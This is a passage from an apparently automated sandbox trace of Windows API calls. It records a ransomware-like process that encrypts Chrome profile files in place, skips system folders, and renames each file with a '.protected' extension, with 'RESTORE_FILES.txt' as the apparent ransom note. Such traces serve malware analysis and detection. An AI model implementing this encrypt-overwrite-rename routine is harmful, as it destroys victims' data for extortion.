lpFindFileData=0x295e560) returned 1 [0084.235] lstrcmpiW (lpString1="Network Action Predictor-journal", lpString2="Windows") returned -1 [0084.235] lstrcmpiW (lpString1="Network Action Predictor-journal", lpString2="Program Files") returned -1 [0084.235] lstrcmpiW (lpString1="Network Action Predictor-journal", lpString2="Program Files (x86)") returned -1 [0084.235] lstrcmpiW (lpString1="Network Action Predictor-journal", lpString2="$Recycle.bin") returned 1 [0084.235] lstrcmpiW (lpString1="Network Action Predictor-journal", lpString2="System Volume Information") returned -1 [0084.235] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal") returned 112 [0084.235] StrStrIW (lpFirst="Network Action Predictor-journal", lpSrch=".protected") returned 0x0 [0084.235] lstrcmpW (lpString1="Network Action Predictor-journal", lpString2="RESTORE_FILES.txt") returned -1 [0084.235] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.235] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.235] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal") returned 112 [0084.236] StrStrW (lpFirst="Network Action Predictor-journal", lpSrch=".txt") returned 0x0 [0084.236] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal") returned 112 [0084.236] StrStrW (lpFirst="Network Action Predictor-journal", lpSrch=".rar") returned 0x0 [0084.236] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal") returned 112 [0084.236] StrStrW (lpFirst="Network Action Predictor-journal", lpSrch=".zip") returned 0x0 [0084.236] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.236] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.236] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.236] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.236] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.237] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.237] CloseHandle (hObject=0x154) returned 1 [0084.238] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal.protected") returned 122 [0084.238] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor-journal.protected")) returned 1 [0084.238] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.238] lstrcmpiW (lpString1="Network Persistent State", lpString2="Windows") returned -1 [0084.238] lstrcmpiW (lpString1="Network Persistent State", lpString2="Program Files") returned -1 [0084.238] lstrcmpiW (lpString1="Network Persistent State", lpString2="Program Files (x86)") returned -1 [0084.238] lstrcmpiW (lpString1="Network Persistent State", lpString2="$Recycle.bin") returned 1 [0084.238] lstrcmpiW (lpString1="Network Persistent State", lpString2="System Volume Information") returned -1 [0084.238] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State") returned 104 [0084.238] StrStrIW (lpFirst="Network Persistent State", lpSrch=".protected") returned 0x0 [0084.239] lstrcmpW (lpString1="Network Persistent State", lpString2="RESTORE_FILES.txt") returned -1 [0084.239] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.239] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network persistent state"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.239] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State") returned 104 [0084.239] StrStrW (lpFirst="Network Persistent State", lpSrch=".txt") returned 0x0 [0084.239] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State") returned 104 [0084.239] StrStrW (lpFirst="Network Persistent State", lpSrch=".rar") returned 0x0 [0084.239] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State") returned 104 [0084.239] StrStrW (lpFirst="Network Persistent State", lpSrch=".zip") returned 0x0 [0084.239] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x28, lpOverlapped=0x0) returned 1 [0084.240] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffd8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.240] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x28, lpOverlapped=0x0) returned 1 [0084.241] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.241] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.241] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.241] CloseHandle (hObject=0x154) returned 1 [0084.241] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State.protected") returned 114 [0084.241] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network persistent state"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network persistent state.protected")) returned 1 [0084.242] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.242] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="Windows") returned -1 [0084.242] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="Program Files") returned -1 [0084.242] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="Program Files (x86)") returned -1 [0084.242] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="$Recycle.bin") returned 1 [0084.242] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="System Volume Information") returned -1 [0084.242] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs") returned 98 [0084.242] StrStrIW (lpFirst="Origin Bound Certs", lpSrch=".protected") returned 0x0 [0084.242] lstrcmpW (lpString1="Origin Bound Certs", lpString2="RESTORE_FILES.txt") returned -1 [0084.242] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.242] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.242] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs") returned 98 [0084.242] StrStrW (lpFirst="Origin Bound Certs", lpSrch=".txt") returned 0x0 [0084.242] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs") returned 98 [0084.243] StrStrW (lpFirst="Origin Bound Certs", lpSrch=".rar") returned 0x0 [0084.243] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs") returned 98 [0084.243] StrStrW (lpFirst="Origin Bound Certs", lpSrch=".zip") returned 0x0 [0084.243] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x1400, lpOverlapped=0x0) returned 1 [0084.246] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffec00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.246] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x1400, lpOverlapped=0x0) returned 1 [0084.247] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.247] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.247] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.247] CloseHandle (hObject=0x154) returned 1 [0084.247] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs.protected") returned 108 [0084.248] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs.protected")) returned 1 [0084.248] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.248] lstrcmpiW (lpString1="Origin Bound Certs-journal", lpString2="Windows") returned -1 [0084.248] lstrcmpiW (lpString1="Origin Bound Certs-journal", lpString2="Program Files") returned -1 [0084.248] lstrcmpiW (lpString1="Origin Bound Certs-journal", lpString2="Program Files (x86)") returned -1 [0084.248] lstrcmpiW (lpString1="Origin Bound Certs-journal", lpString2="$Recycle.bin") returned 1 [0084.248] lstrcmpiW (lpString1="Origin Bound Certs-journal", lpString2="System Volume Information") returned -1 [0084.248] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal") returned 106 [0084.248] StrStrIW (lpFirst="Origin Bound Certs-journal", lpSrch=".protected") returned 0x0 [0084.248] lstrcmpW (lpString1="Origin Bound Certs-journal", lpString2="RESTORE_FILES.txt") returned -1 [0084.248] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.248] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal") returned 106 [0084.249] StrStrW (lpFirst="Origin Bound Certs-journal", lpSrch=".txt") returned 0x0 [0084.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal") returned 106 [0084.249] StrStrW (lpFirst="Origin Bound Certs-journal", lpSrch=".rar") returned 0x0 [0084.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal") returned 106 [0084.249] StrStrW (lpFirst="Origin Bound Certs-journal", lpSrch=".zip") returned 0x0 [0084.249] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.249] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.249] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.249] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.249] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.250] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.250] CloseHandle (hObject=0x154) returned 1 [0084.251] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal.protected") returned 116 [0084.251] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs-journal.protected")) returned 1 [0084.251] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.251] lstrcmpiW (lpString1="Preferences", lpString2="Windows") returned -1 [0084.251] lstrcmpiW (lpString1="Preferences", lpString2="Program Files") returned -1 [0084.251] lstrcmpiW (lpString1="Preferences", lpString2="Program Files (x86)") returned -1 [0084.251] lstrcmpiW (lpString1="Preferences", lpString2="$Recycle.bin") returned 1 [0084.251] lstrcmpiW (lpString1="Preferences", lpString2="System Volume Information") returned -1 [0084.251] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences") returned 91 [0084.251] StrStrIW (lpFirst="Preferences", lpSrch=".protected") returned 0x0 [0084.251] lstrcmpW (lpString1="Preferences", lpString2="RESTORE_FILES.txt") returned -1 [0084.251] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.251] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\preferences"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.252] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences") returned 91 [0084.252] StrStrW (lpFirst="Preferences", lpSrch=".txt") returned 0x0 [0084.252] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences") returned 91 [0084.252] StrStrW (lpFirst="Preferences", lpSrch=".rar") returned 0x0 [0084.252] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences") returned 91 [0084.252] StrStrW (lpFirst="Preferences", lpSrch=".zip") returned 0x0 [0084.252] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x1a9d, lpOverlapped=0x0) returned 1 [0084.253] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffe563, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.253] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1a9d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x1a9d, lpOverlapped=0x0) returned 1 [0084.254] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.254] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.254] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.254] CloseHandle (hObject=0x154) returned 1 [0084.254] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences.protected") returned 101 [0084.254] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\preferences"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\preferences.protected")) returned 1 [0084.255] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.255] lstrcmpiW (lpString1="previews_opt_out.db", lpString2="Windows") returned -1 [0084.255] lstrcmpiW (lpString1="previews_opt_out.db", lpString2="Program Files") returned -1 [0084.255] lstrcmpiW (lpString1="previews_opt_out.db", lpString2="Program Files (x86)") returned -1 [0084.255] lstrcmpiW (lpString1="previews_opt_out.db", lpString2="$Recycle.bin") returned 1 [0084.255] lstrcmpiW (lpString1="previews_opt_out.db", lpString2="System Volume Information") returned -1 [0084.255] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db") returned 99 [0084.255] StrStrIW (lpFirst="previews_opt_out.db", lpSrch=".protected") returned 0x0 [0084.255] lstrcmpW (lpString1="previews_opt_out.db", lpString2="RESTORE_FILES.txt") returned -1 [0084.255] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.255] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db") returned 99 [0084.255] StrStrW (lpFirst="previews_opt_out.db", lpSrch=".txt") returned 0x0 [0084.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db") returned 99 [0084.255] StrStrW (lpFirst="previews_opt_out.db", lpSrch=".rar") returned 0x0 [0084.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db") returned 99 [0084.255] StrStrW (lpFirst="previews_opt_out.db", lpSrch=".zip") returned 0x0 [0084.255] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.262] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.262] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.263] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, 